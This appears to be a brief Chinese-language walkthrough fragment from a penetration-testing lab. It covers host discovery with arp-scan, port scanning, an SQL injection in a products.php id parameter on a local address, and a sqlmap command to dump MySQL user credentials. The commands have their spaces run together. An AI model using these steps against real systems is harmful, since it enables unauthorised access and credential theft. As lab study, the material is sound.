getshell主机发现 arp-scan-l端口目录扫描，目录没有扫出来有利信息，查看端口，开放21,22端口，留意一下访问主页http://192.168.1.120/products.php?id=63 id处存在sql注入获取数据库下的账号密码sqlmap-uhttp://192.168.1.120/products.php?id=1-Dmysql--users